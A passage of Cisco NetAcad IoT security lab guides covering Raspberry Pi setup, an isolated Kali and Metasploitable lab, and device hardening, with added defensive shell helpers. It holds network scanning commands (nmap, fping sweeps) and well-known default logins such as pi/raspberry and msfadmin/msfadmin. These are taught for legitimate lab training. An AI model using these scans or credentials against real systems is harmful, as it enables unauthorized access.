Course Materials, by copying this folder to your computer.
f. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
placing an empty file named ssh in D drive (D:\ssh). When the Raspberry Pi boots, SSH is enabled when
the file is found, and the file ssh is deleted from the file system.
g. Before removing the µSD card from your computer, make sure to safely unmount it by right-clicking the
drive and selecting Eject USB Storage.
h. Remove the µSD card from your computer.

Alternate Step 4 for Advanced Linux users: Set up a µSD card with PL-App
This is a command-line only guide for advanced Linux users. Be very careful. Incorrect use of these tools
might overwrite the data on your primary hard disk. All the existing contents of the µSD card will be
overwritten in this step.
a. Change the current working directory to the location of the PL-App image zip file that you downloaded
previously:
cd Downloads
b. Identify the device name of your µSD card (e.g. sdb):
sudo fdisk -l
c. Check if any of the µSD card partitions are mounted using the mount command and then unmount them.
d. Using dd, transfer the PL-App image to your µSD card (Use caution at this step. Selecting a wrong output
file "of=" parameter can overwrite your own hard disk drive and your own data):
unzip -p PL-App-xxxxxx.zip | sudo dd bs=1M of=/dev/{SD card device name}
e. Wait for dd to complete. It might take 5-10 minutes without showing any output. Be patient.
f. When completed, remove the µSD card USB reader, wait a second, and then plug it back in to mount the
newly created partition on it.
g. In the mounted µSD card partition (FAT file system, 1 GB in size, labeled CISCO-PLAPP), create a new
text file called chestnut.txt with the following contents:
Device_Name="{YOUR-NETACAD-USERNAME}-{YOUR-RPi-DEVICE-NAME}"
Device_Password="{YOUR-PL-App-PASSWORD}"
SSID="{YOUR-WIFI-SSID}"
Wifi_Password="{YOUR-WIFI-PASSWORD}"

Example:
Device_Name="myNetAcadUsername-myRPi1"
Device_Password="this is my device password"
SSID="ClassroomWIFI"
Wifi_Password="WPA2password"
h. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
creating an empty file named ssh in the CISCO-PLAPP partition. When the Raspberry Pi boots, SSH is
enabled when the file is found, and the file ssh is deleted from the file system.
touch ssh
i. Unmount and remove the µSD card USB reader from your computer.
j. Make sure your Linux computer supports mDNS discovery of hostnames:
sudo apt-get install libnss-mdns
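The command-line procedure above is easy to get wrong in exactly the way the warning describes (writing the image to the wrong disk). The following shell functions are an added example, not part of the Cisco lab or of the PL-App tooling, that wrap steps b through h with the checks a careful administrator would want: the Device Name rule from Step 4 is enforced, the target device must be an existing, removable block device that does not hold the root file system, and any mounted partitions of the card are unmounted before dd runs. It assumes a Linux host with unzip, dd, findmnt and sudo, that the device name is passed without the /dev/ prefix, and that the PL-App zip contains a single image file (an assumption about the zip, not something the lab states).

```shell
#!/bin/sh
# Added example (not from the Cisco lab): guarded helpers for the
# Alternate Step 4 flashing procedure. Assumes unzip, dd, findmnt, sudo.

# Device Name rule from Step 4: letters, digits and dashes, first character a letter.
valid_device_name() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z][A-Za-z0-9-]*$'
}

# Accept $1 (e.g. sdb) as the target only if it is an existing block device,
# is marked removable in sysfs, and does not carry the root file system.
safe_target_device() {
  dev="$1"
  [ -n "$dev" ] || return 1
  [ -b "/dev/$dev" ] || return 1
  root_src=$(findmnt -n -o SOURCE / 2>/dev/null || true)
  case "$root_src" in
    "/dev/$dev"*) return 1 ;;   # /dev/sda2 or /dev/nvme0n1p2 both start with the disk name
  esac
  [ "$(cat "/sys/block/$dev/removable" 2>/dev/null)" = "1" ]
}

# Step c: unmount every mounted partition of the card before writing to it.
unmount_card() {
  grep "^/dev/$1" /proc/mounts | while read -r _src mnt _rest; do
    sudo umount "$mnt"
  done
}

# Step d: unzip -p streams the archive member to stdout, so the image is never
# unpacked to disk; dd writes it to the card. Nothing is written unless the
# safety check passes.
flash_image() {
  zip="$1"; dev="$2"
  safe_target_device "$dev" || { echo "refusing to write to /dev/$dev" >&2; return 1; }
  unmount_card "$dev"
  unzip -p "$zip" | sudo dd bs=1M of="/dev/$dev"
  sync
}

# Steps g and h: write chestnut.txt and the empty ssh marker into the mounted
# CISCO-PLAPP partition ($1). Fails without writing if the Device Name is invalid.
write_chestnut_config() {
  mnt="$1"; name="$2"; pass="$3"; ssid="$4"; wifipass="$5"
  valid_device_name "$name" || { echo "invalid Device_Name: $name" >&2; return 1; }
  {
    printf 'Device_Name="%s"\n' "$name"
    printf 'Device_Password="%s"\n' "$pass"
    printf 'SSID="%s"\n' "$ssid"
    printf 'Wifi_Password="%s"\n' "$wifipass"
  } > "$mnt/chestnut.txt"
  : > "$mnt/ssh"
}

# Usage with constructed values (device name and mount point will differ):
#   flash_image PL-App-xxxxxx.zip sdb
#   write_chestnut_config /media/CISCO-PLAPP myNetAcadUsername-myRPi1 'my device password' ClassroomWIFI WPA2password
```

Because chestnut.txt holds the device and Wi-Fi passwords in clear text, as Step 4 notes, the values passed to write_chestnut_config should be unique to this device and never reused from other accounts.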

Part 2: Accessing PL-App on a Raspberry Pi on the Network


a. Make sure that the Raspberry Pi is powered off. Insert the µSD card into your Raspberry Pi. The µSD
card slot is on the underside of the board:

b. Before entering or removing the µSD card, always make sure that the Raspberry Pi is powered off.
c. Connect the Raspberry Pi to the LAN. If you are using an Ethernet cable, connect the cable to the
Raspberry Pi. Your computer and the Raspberry Pi must be in the same subnet for the PL-App Launcher
discovery to work.
Note: Some labs require Internet connectivity, so a separate Internet connection is desirable.
Instructor Note: The LAN should provide IP addresses to the Raspberry Pi devices using DHCP. In
addition, the network must not block multicast communication. Auto-configured APIPA addresses may
also be used for labs that do not require a connection to the Internet or other LAN resources.
d. Recommended network topology for a classroom with PL-App:

e. Power on your Raspberry Pi by connecting the micro USB cable with a power supply that provides
enough current to the Raspberry Pi board. The recommended PSU provides 2.5A to power the Raspberry
Pi 3 Model B.

Note: The red Power LED must be on. If the Power LED is blinking, or is off, the power source from the
PSU is not providing enough power to the board.
f. Start the PL-App Launcher application on a PC that is on the same network as the Raspberry Pi. You
should see the following screen with the Available Devices tab:

g. The Available Devices tab lists all the PL-App devices that have been set up on this computer with PL-
App Launcher, or that were manually added to the list using the Add Device Name button.
PL-App Launcher is continuously trying to discover the listed PL-App Raspberry Pi devices even if they
are not connected to the network. When a device is discovered, its current IP address is shown in the list
and the Connect button turns green.
Note: The first startup of a freshly written µSD card might take longer to connect due to the initial setup
process (expanding the file system of the µSD card, etc.).
Instructor Note: PL-App Launcher is using multicast DNS (mDNS, Bonjour) to discover the listed PL-App
Raspberry Pi devices. Without mDNS routing configured, the discovery mechanism only works within the
same one subnet segment. If the network is blocking multicast communication, PL-App Launcher will be
unable to discover connected devices. In that case, try to select the “Use Broadcast mDNS” option in the
PL-App Launcher to fall back from multicast to broadcast packets.

As mentioned above, only PL-App images created on the computer will show up in the list of available
devices. Devices can be added manually, however the device name must be entered to enable this.
h. Click the green Connect button of your device in PL-App Launcher to directly connect to the local PL-App
web interface that is running on your Raspberry Pi. This opens a new web browser window and
establishes a connection to the selected PL-App over HTTP.
i. Log in to the web interface of PL-App. Use the device password you specified in PL-App Launcher in the
setup process of the µSD card.
After a successful login, the PL-App directory browser opens the root directory of the notebooks:

This is the PL-App’s representation of the notebooks folder that was created on the µSD card.
The basic structure of the folders in the root notebooks directory is as follows:
o Course Materials: this folder contains Cisco authored labs in the form of Jupyter Notebooks.
o myfiles: this folder is your space to create your own Jupyter Notebooks and other files.

Appendix: Troubleshooting PL-App


a. Make sure the computer with PL-App meets these criteria:
o On the same subnet as the PL-App Raspberry Pi
o Not connected to VPN
b. If the onboard Red Power LED is anything but solid on (blinking, off, etc.), replace the PSU. The PSU is
unable to provide enough power for the Raspberry Pi.
c. If the onboard green µSD card LED is constantly off or constantly on (more than 30 seconds) perform
these steps:
1) Check that the SD card is correctly inserted in the SD card slot on the underside of the Raspberry Pi
board.
2) Re-flash the µSD card with PL-App Launcher and the PL-App image.
3) Replace the µSD card. It has been found that some SD cards are not compatible with the Raspberry
Pi.
d. Verify the µSD card drive on a computer. Check the chestnut.txt file in the root directory of the µSD card
drive. Verify that the Device_Name specified in chestnut.txt matches the PL-App device name in the PL-
App Launcher Devices tab.
e. If connecting with Wi-Fi, perform these steps:
1) Verify the network name (SSID) and corresponding WPA2 password in chestnut.txt.
2) Connect to the network with an Ethernet cable (connect the computer too).
3) Check if multicast is enabled on the Wi-Fi network.
f. If connecting with an Ethernet cable, perform these steps:
1) Make sure multicast is not blocked or filtered.
2) Make sure DHCP is assigning IP addresses from the same subnet to the Raspberry Pi and the
computer.
g. Try to connect to a different Raspberry Pi board.

Lab – Set Up the IoT Security Lab Topology (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Setup the Lab Environment
Part 2: Import the IoT Security Virtual Machines

Background / Scenario
Computing power and resources have increased tremendously over the last 10 years. A benefit of having
multicore processors and large amounts of RAM is the ability to use virtualization. With virtualization, one or
more virtual computers operate inside one physical computer. Virtual computers that run within physical
computers are called virtual machines (VMs). VMs are often called guests, and physical computers are often
called hosts. Anyone with a modern computer and operating system can run VMs.
In this lab, you will set up and explore the lab environment that will be used in this course. A VM is used for
many of the labs in this course. The VM is created with Oracle VirtualBox and an Oracle virtual appliance
(OVA) file. The OVA file contains a special version of Linux called Kali. Kali is a very popular Linux distribution
that contains many tools that are used for assessing network security. VirtualBox allows you to run this
version of Linux on a Mac or PC as a VM. You can use this VM to interact with other hosts on the lab network.
Note: Only use Kali tools on networks on which you are authorized to do so. Abuse of the Kali tools will be a
violation of your ethical hacking agreement.

Required Resources
• Host computer with at least 4 GB of RAM and 15 GB of free disk space
• Oracle VirtualBox
• IoT Security Kali Linux OVA and Metasploitable OVA files
• Internet connection
• An Ethernet patch cable

Part 1: Setup the Lab Environment


Follow the directions of your instructor to build a lab topology similar to the one shown in the Topology section
of this lab. Your topology may differ slightly. For example, several PCs and Raspberry Pi devices may be
connected to the same switch. What is important is that you can identify your own target Raspberry Pi using
PL-App launcher.
Note: For now, do not connect Raspberry Pi devices to the network.
Instructor Note: The topology diagram provided above should serve as a guideline for the communication
requirements for a single PC and Raspberry Pi pair. Depending on the lab environment and the resources
available, it is possible that multiple pairs will be connected to the same switch.
Internet access is not required after the files have been downloaded. This is to isolate the student hosts from
the campus network to avoid abuse of the Kali penetration testing tools on a production network.
To avoid the possibility that Kali could be used on the school network, the Kali VM will be directly connected
to the Raspberry Pi in Part 2 of this lab. A number of PCs and Raspberry Pi devices can be connected to
each other using a switch as well. It is important that the switch not uplink to the Internet. In addition, Kali is
preconfigured with an address on the 203.0.113.0/24 network. This network is reserved for documentation
and testing.
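Before any Kali tool is run, it is worth confirming that the VM really is on the isolated 203.0.113.0/24 segment with no path to the campus network. The script below is an added example, not part of the Cisco lab files, that checks exactly that: the eth0 address must fall inside 203.0.113.0/24 (the RFC 5737 documentation range the lab uses) and the routing table must contain no default route. It assumes the iproute2 ip command and the interface name eth0, which is the interface the lab's ifconfig step refers to.

```shell
#!/bin/sh
# Added example (not from the Cisco lab): verify a Kali host is confined to
# the 203.0.113.0/24 lab network. Assumes iproute2 "ip" and interface eth0.

# Return 0 when $1 is a dotted-quad IPv4 address inside 203.0.113.0/24.
in_lab_subnet() {
  printf '%s' "$1" | grep -Eq '^203\.0\.113\.[0-9]{1,3}$' || return 1
  [ "${1##*.}" -le 255 ]
}

# Return 0 when the routing-table text in $1 has no default route, i.e. no
# path off the lab segment. Matches both "ip route" and "route -n" formats.
no_default_route() {
  ! printf '%s\n' "$1" | grep -Eq '^default |^0\.0\.0\.0 '
}

# Live check on this host. Prints a reason to stderr and returns 1 on failure.
lab_isolated() {
  addr=$(ip -4 -o addr show dev eth0 2>/dev/null | awk '{print $4}' | cut -d/ -f1)
  in_lab_subnet "$addr" || { echo "eth0 address '$addr' is not in 203.0.113.0/24" >&2; return 1; }
  routes=$(ip -4 route show 2>/dev/null)
  no_default_route "$routes" || { echo "a default route exists; host is not isolated" >&2; return 1; }
  echo "eth0 is $addr and no default route is present: lab network is isolated"
}

# Usage:
#   lab_isolated && ./lab_support_files/scripts/start_dhcp.sh
```

Running lab_isolated before start_dhcp.sh adds a second safeguard to the physical one described in the Instructor Note: even if someone reconnects the PC to an uplinked switch, the DHCP server and the Kali tools are not started while a route to another network exists.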

Step 1: Download and Install Oracle VirtualBox.


a. Navigate to the Oracle VirtualBox downloads page.
b. Choose and download the appropriate installation file for your operating system.
c. After you have downloaded the VirtualBox installation file, run the installer and accept the default
installation settings.
d. Download the IoT Security VM file from here: Kali OVA and Metasploitable OVA.

Step 2: Connect the Network Topology


a. Disconnect the PC from the school network and directly connect the PC to the Raspberry Pi with the
Ethernet patch cable.

Part 2: Import the IoT Security Virtual Machines

Step 1: Import the virtual machine appliance into VirtualBox.


You will open VirtualBox and import the IoT Security Kali VM .ova file to create a Kali virtual machine.
Note: The screen may look different depending on your version of VirtualBox.
a. Open VirtualBox. From the file menu, select: File > Import Appliance. Locate and select the
Kali_IoTSec.ova file that you downloaded and click Next.

b. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at the bottom of the window. Leave all other settings as
default. Click Import.
c. After the import is complete, VirtualBox will show the new Kali VM in its inventory. Your Kali Linux VM file
name might be different than the graphic shown below.

d. Repeat the import process for the Metasploitable VM.

Step 2: Verify Network Connectivity.


In this step, you will ensure that networking is configured between the VMs and the Raspberry Pi.
The host computer has been disconnected from the campus network and connected directly to the Raspberry
Pi. Because DHCP will no longer be available from the network DHCP service, we will need to run a Linux
shell script that starts a DHCP server on the Kali VM. This provides the Raspberry Pi with an IP address.
TCP/IP communication will then be established between the VMs and the Raspberry Pi.
Instructor Note: If you are using a network switch to connect the PC and Raspberry Pi pairs, please alter this
instruction accordingly.
a. Return to the VirtualBox VM player window. Highlight the Kali VM in the list.
b. Click the green Start arrow in the menu bar. After a brief delay, you should see a new window open that
displays a Username: field.
c. Enter the username of root and click Next to continue. Use toor for the password and click Sign in. If
you have typed the username incorrectly for the Kali VM, click Cancel to input the correct username.

d. After Kali starts, you should see the desktop as shown below.

e. Click the Terminal icon in the desktop applications bar as shown in the figure.

f. Run the shell script that will configure IP addressing. To run the script, at the terminal prompt type the
following:
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
g. After the script executes, at the terminal prompt, type ifconfig.
root@kali:~# ifconfig
What IP address was assigned to the VM eth0 interface? ____________________________ 203.0.113.1
h. Minimize the VirtualBox window and open PL-App. Select the Available Devices tab. You should see your
Raspberry Pi listed. Make note of the IP address of your Raspberry Pi.
IP address of the Raspberry Pi: ___________________________________
Note: If PL-App is not showing the IP address of the Raspberry Pi, use the command fping at the
terminal window to determine the IP address.
root@kali:~# fping -a -r 0 -g 203.0.113.0/24
Warning: The use of fping can be considered as an attack. Please do not use this command on a
production network.

i. Return to the VM. At a terminal prompt, ping the IP address of your Raspberry Pi. Use the -c 5 parameter
to limit your ping to five echo requests. If everything is working properly, you should see five successful
echo replies. You have now tested the connection between the Kali Linux virtual machine and the
Raspberry Pi.
j. Now open the Firefox ESR browser from the Kali desktop applications bar. Its icon is just above the
Terminal icon.
k. Type the IP address of the Raspberry Pi into the address bar and press Enter. You should see the
Jupyter notebooks home page appear.
Note: Because the VM shares the same network adapter as the physical computer, you can access the
Pi from either machine.
l. Start and log into the Metasploitable VM. Notice the displayed messages.
What is the login credential?
____________________________________________________________________________________
Username: msfadmin password: msfadmin
What is the IP address assigned to Metasploitable VM? What was the command used to determine the IP
address?
____________________________________________________________________________________
The IP address is 203.0.113.5. The command used to determine the IP address is ifconfig.
Note: To release the mouse from Metasploitable VM, press the right control key.
m. To verify network connectivity, you should be able to ping all the VMs and the Raspberry Pi.

Step 3: Shut down the VMs.


a. In the VirtualBox menu in the Kali VM window, select File > Close.
b. Click the Save the machine state radio button and click OK. The next time you start the virtual machine,
you will be able to resume working in the operating system in its current state.
The other two options are:
• Send the shutdown signal: This option simulates safely shutting down a physical computer.
• Power off the machine: This option simulates an unsafe shutdown of a physical computer.
c. Repeat the shutdown process for the Metasploitable VM.

Lab - Harden a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Securing Remote Access
Part 2: Removing the Default Pi User Account
Part 3: Configuring the Uncomplicated Firewall (UFW)

Background/Scenario
The Raspberry Pi is a doorway to the Internet of Things (IoT). In this lab you will take a Raspberry Pi that is
acting as an IoT gateway device and perform device hardening. You will harden the Raspberry Pi by following
recommended security practices for the Raspbian OS. You will also limit the network protocols and services
allowed to connect to the IoT gateway by activating and configuring the Uncomplicated Firewall (UFW).
Finally, you will utilize a separate Kali VM with the Kali Linux OS, acting as a threat actor, to test the security
of the IoT gateway.

Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi

Part 1: Securing Remote Access


The Raspberry Pi comes with a default user called “pi” with the default password of “raspberry” which is well
known. While this makes it easy to use the system, it is not very secure. Anyone with network access to your
Pi could login with these widely known credentials. Furthermore, because the SSH server and HTTP server
on the Pi are enabled, unknown users on the network could attempt a connection using these default
credentials. While basic security would advise the changing of the password for the “pi” user, having a default
username alone is a security risk.

Step 1: Access the Raspberry Pi remotely.


a. Connect the Raspberry Pi to the Kali VM host as shown in the topology.
b. Start the Kali VM and login with the username root and the password toor.
c. On the Kali VM, run the shell script to configure IP addressing. To run the script, at the terminal prompt
type the following:
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
d. Use the PL-App or the command fping -ag 203.0.113.0/24 in a terminal on the Kali VM to determine the
IP address of your Raspberry Pi.
Record the IP address of your Raspberry Pi. ________________________________________________
e. Every Raspberry Pi has the default username pi and password raspberry. Use SSH to remotely access
the Raspberry Pi. The IP address used in this lab is only an example; the IP address of your Raspberry Pi
may be different, but it will be in the subnet 203.0.113.1/24.
Open a terminal on the Kali VM and SSH into your Raspberry Pi using the pi account.
root@kali:~# ssh pi@203.0.113.12
If you were unsuccessful, you can start the service from the PL-App terminal through the web interface:
(pl-app) root@myPi:~# systemctl enable ssh
(pl-app) root@myPi:~# systemctl start ssh
The enable command allows the service to restart automatically after the system reloads. The start
command only starts the service during this session, and the service will no longer be available after a
reboot without starting it again manually.
For more information about enabling SSH, navigate to
https://www.raspberrypi.org/documentation/remote-access/ssh/.

Step 2: Securing the user accounts


As noted above, basic security practice advises changing the password of the pi user, but simply having a
default username is a security risk. Instead, you will create a new user with sudo permissions. After the new
user has the appropriate permissions, the default pi user can be deleted.
Note: The name of the Raspberry Pi that appears in the terminal will differ depending on the device name
that was configured in PL-App launcher when the SD card was made.
a. Add a new user to the Raspberry Pi with the command sudo adduser kingbob in the terminal. Choose a
secure password to use and provide any user information desired.
pi@IoTpi:~ $ sudo adduser kingbob
b. Give the kingbob user sudo permissions by adding it to the sudo group with the command sudo adduser
kingbob sudo.
pi@IoTpi:~ $ sudo adduser kingbob sudo
Adding user `kingbob' to group `sudo' ...
Adding user kingbob to group sudo
Done.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

c. To stop the Raspberry Pi from logging in to a user account automatically at boot, issue the sudo raspi-config
terminal command.
pi@IoTpi:~ $ sudo raspi-config
d. Select Boot Options to configure options for start-up.
e. Select Desktop / CLI to choose whether to boot into a desktop environment or the command line.
f. Select Console to require users to log into text console.
g. Select Finish and click Yes to reboot when prompted.
h. After reboot, use the Kali VM to SSH into the kingbob account of the IoTpi.
root@kali:~# ssh kingbob@203.0.113.12

Step 3: Secure remote access.


Using SSH as the method for remote access does not, by itself, provide strong security. A default SSH
installation accepts a password from any local account, commonly including accounts with a default
password. To implement stronger security when deploying an SSH server, restrict which user accounts are
permitted to authenticate. This step includes the activation of the SSH service and the restriction of which
users may authenticate over SSH.
Note: The usernames are for example only. Choose your desired usernames. Create a new user account
specifically for remote access connections.
a. You will create kevin, a standard user, with the command sudo adduser kevin. Provide the necessary
information when prompted.
kingbob@IoTpi:~ $ sudo adduser kevin

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for kingbob:

b. Finally, you will edit the sshd_config file located in the /etc/ssh directory to limit the users that are
allowed to access this device using SSH.
Edit the /etc/ssh/sshd_config file by adding the following lines to the end of the file:
AllowUsers kingbob
DenyUsers kevin
Edit the file by using a text editor, such as nano.
kingbob@IoTpi:~ $ sudo nano /etc/ssh/sshd_config
Predict the success of SSH access for the users kingbob and kevin. Record your predictions below.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

The AllowUsers kingbob line permits SSH authentication using the username and password of the local
kingbob account. The DenyUsers kevin line prevents SSH authentication using the kevin credentials. Note
that once an AllowUsers line is present, sshd rejects every user it does not list, so kevin would be denied
even without the DenyUsers line; the explicit DenyUsers entry documents the intent.
c. To force the SSH settings to take effect now, restart the SSH service using sudo systemctl restart ssh.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
d. Verify that the kevin user account cannot be exploited by a threat actor via the SSH service. Issue the
command ssh kevin@203.0.113.12 to attempt an SSH connection with the kevin username.
root@kali:~# ssh kevin@203.0.113.12
e. After entering the password for the kevin user account, the IoT gateway reports that SSH access is denied.
kevin@203.0.113.12's password:
Permission denied, please try again.
f. SSH into the Raspberry Pi using the kingbob account, which is permitted to access the IoTpi via SSH.
root@kali:~# ssh kingbob@203.0.113.12
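To predict the outcome of the AllowUsers/DenyUsers edit before restarting sshd, here is an added shell example (not part of the lab) that applies sshd's evaluation order to a config file: a DenyUsers match rejects first, and if any AllowUsers line exists only listed users pass. It ignores AllowGroups/DenyGroups and Match blocks, and the sshd_config fragment it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the lab): predict whether sshd will accept a user,
# given the AllowUsers/DenyUsers lines of an sshd_config file. It follows the
# order sshd applies: a DenyUsers match rejects first; then, if any AllowUsers
# line exists, only users matching one of its patterns are accepted.
# AllowGroups/DenyGroups and Match blocks are deliberately not handled.

# Print, one per line, every pattern given for keyword $2 in config file $1.
# Commented-out lines are skipped and several lines for the keyword are merged,
# which is also how sshd accumulates these directives.
ssh_patterns() {
    grep -iE "^[[:space:]]*$2[[:space:]]" "$1" 2>/dev/null \
        | sed -E 's/^[[:space:]]*[^[:space:]]+[[:space:]]+//' \
        | tr ' \t' '\n\n' | grep -v '^$'
}

# Return 0 when user $1 matches any pattern read from stdin. Patterns may use
# the * and ? wildcards; a USER@HOST pattern is compared on its USER part only
# (a simplification for this example).
matches_any() {
    while read -r pat; do
        pat=${pat%%@*}
        case $1 in
            $pat) return 0 ;;
        esac
    done
    return 1
}

# Print "allowed" or "denied" for user $2 under config $1 (exit status 0/1).
ssh_user_permitted() {
    cfg=$1; user=$2
    if ssh_patterns "$cfg" DenyUsers | matches_any "$user"; then
        echo denied; return 1
    fi
    if [ -n "$(ssh_patterns "$cfg" AllowUsers)" ]; then
        if ssh_patterns "$cfg" AllowUsers | matches_any "$user"; then
            echo allowed; return 0
        fi
        echo denied; return 1
    fi
    echo allowed; return 0
}

# Constructed sshd_config fragment mirroring the lab's edit, plus one
# commented-out line to show that comments are ignored.
demo_cfg=$(mktemp)
printf '%s\n' 'Port 22' '#AllowUsers pi' 'AllowUsers kingbob' 'DenyUsers kevin' > "$demo_cfg"
for u in kingbob kevin pi; do
    printf '%s: %s\n' "$u" "$(ssh_user_permitted "$demo_cfg" "$u")"
done
rm -f "$demo_cfg"
```

Note that pi is reported as denied although it appears in no DenyUsers line: the AllowUsers line alone excludes it.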

Part 2: Removing the Default Pi User Account

Step 1: Open a terminal and remove the Pi account but leave the directory.
a. To remove the pi account from the IoT gateway, make sure you are logged into the “kingbob” account.
Then, enter the sudo deluser pi command in the terminal.
kingbob@IoTpi:~ $ sudo deluser pi
Removing user `pi' ...
Warning: group `pi' has no more members.
Done.

Step 2: Require a password with the command sudo.


By default, the Raspbian OS does not require a password when sudo is placed in front of a command to run it
as the superuser. If your IoT gateway is exposed to the Internet and is somehow compromised (for example
via a webpage exploit), the attacker will be able to change items that require superuser rights unless you
have set sudo to require a password.
a. To force sudo to require a password, you will edit the file /etc/sudoers.d/010_pi-nopasswd.
kingbob@IoTpi:~ $ sudo nano /etc/sudoers.d/010_pi-nopasswd
pi ALL=(ALL) NOPASSWD: ALL
List all the users who can access superuser privileges without inputting their password.
____________________________________________________________________________________
Answers can vary. The user pi is probably the only one that has superuser access at this time.
b. Replace the pi entry with your username, kingbob, with superuser rights.
kingbob ALL=(ALL) PASSWD: ALL
c. Now save the file and reboot.
kingbob@IoTpi:~ $ sudo reboot
How would you verify that the pi user account has been deleted?
____________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

____________________________________________________________________________________
Search for pi in /etc/passwd or other files that have username info. A sample command to look for pi: grep
pi /etc/passwd
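Beyond grepping /etc/passwd, a defender also wants to know whether any sudoers rule still names the deleted account. The following is an added shell example (not part of the lab) that audits a sudoers.d directory for NOPASSWD entries and flags any that name a user absent from the passwd file, which is exactly what is left behind if pi is deleted before 010_pi-nopasswd is edited; the directory and passwd file it builds are constructed, and audit_nopasswd is an assumed helper name.

```shell
#!/bin/sh
# Added example (not from the lab): audit a sudoers.d directory for rules that
# grant superuser rights without a password (NOPASSWD) and flag rules that
# name a user who no longer exists in the passwd file. Deleting pi before
# editing /etc/sudoers.d/010_pi-nopasswd leaves exactly such a stale rule.
# Only the simple "user HOSTS=(RUNAS) NOPASSWD: COMMANDS" form used by
# Raspbian is parsed; aliases and line continuations are not handled.

# Print "principal file" for every NOPASSWD rule under directory $1,
# skipping comment and blank lines.
nopasswd_principals() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        grep -v '^[[:space:]]*#' "$f" | grep 'NOPASSWD:' \
            | awk -v file="$f" 'NF { print $1, file }'
    done
}

# For each NOPASSWD principal print "principal state file", where state is
# "group" for %group entries, "ok" for a user present in passwd file $2, and
# "missing" for a user that is not (a stale rule that should be removed).
audit_nopasswd() {
    nopasswd_principals "$1" | while read -r who file; do
        case $who in
            %*) state=group ;;
            *)  if grep -q "^$who:" "$2"; then state=ok; else state=missing; fi ;;
        esac
        printf '%s %s %s\n' "$who" "$state" "$file"
    done
}

# Constructed sudoers.d directory and passwd file reproducing the lab state
# after "sudo deluser pi" but before 010_pi-nopasswd has been edited.
demo_dir=$(mktemp -d)
demo_passwd=$(mktemp)
printf 'pi ALL=(ALL) NOPASSWD: ALL\n' > "$demo_dir/010_pi-nopasswd"
printf 'kingbob ALL=(ALL) PASSWD: ALL\n' > "$demo_dir/020_kingbob"
printf 'root:x:0:0:root:/root:/bin/bash\nkingbob:x:1001:1001::/home/kingbob:/bin/bash\n' > "$demo_passwd"
audit_nopasswd "$demo_dir" "$demo_passwd"
rm -rf "$demo_dir" "$demo_passwd"
```

On a real Pi the same audit is run as: sudo sh -c '. ./audit.sh; audit_nopasswd /etc/sudoers.d /etc/passwd' (with the functions saved to audit.sh).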

Part 3: Configuring the Uncomplicated Firewall (UFW)


Uncomplicated Firewall (UFW) provides a more user-friendly framework than the traditional iptables firewall.
iptables has handled the security for Linux for a long time, but UFW provides a much simpler interface with a
good amount of power. UFW is already installed on the IoT gateway Pi, but it needs to be activated and
configured to limit dangerous protocols and services, while allowing important connections to be available.
You will also use network mapper (Nmap) to rapidly scan the network. Nmap is a network scanning tool that
allows you to discover network hosts and resources, including services, ports, operating systems, and other
fingerprinting information. Nmap should not be used to scan networks without prior permission. The act of
network scanning can be considered a form of network attack.
Nmap will test the firewall port/service restriction and IPS capabilities of the IoT gateway. You will run the
scanning program from the Kali Linux VM and attempt to scan open ports on the IoT gateway before and after
configuring the Uncomplicated Firewall (UFW) rules.

Step 1: Identify what network services are listening on the Pi.


a. Connect to the IoT gateway Pi over SSH as kingbob.
b. Start the Telnet and vsftpd servers. These services are started in this lab for demonstration purposes.
They are only available until the Raspberry Pi is reloaded.
kingbob@IoTpi:~ $ sudo systemctl start openbsd-inetd.service
kingbob@IoTpi:~ $ sudo systemctl start vsftpd
c. Open a new terminal on the Kali VM and perform an Nmap scan targeting the TCP ports of the Pi. This
scan checks all TCP ports in the range of 1-65535.
root@kali:~# nmap -p 1-65535 203.0.113.12

Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 13:59 EDT


Nmap scan report for 203.0.113.12
Host is up (0.00043s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds
d. On the Pi, the currently open TCP sessions can be viewed by using ss -t:
kingbob@IoTpi:~ $ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 168 203.0.113.12:ssh 203.0.113.11:34730

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

Step 2: Check the status of the UFW.


a. SSH into the kingbob account, which is the only account allowed to access the Pi.
root@kali:~# ssh kingbob@203.0.113.12
b. Enter sudo ufw status to view the current state of the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw status
Status: inactive
c. If you’d like to specifically view rules added to the UFW, enter sudo ufw show added.
kingbob@IoTpi:~ $ sudo ufw show added
Added user rules (see 'ufw status' for running firewall):
(None)

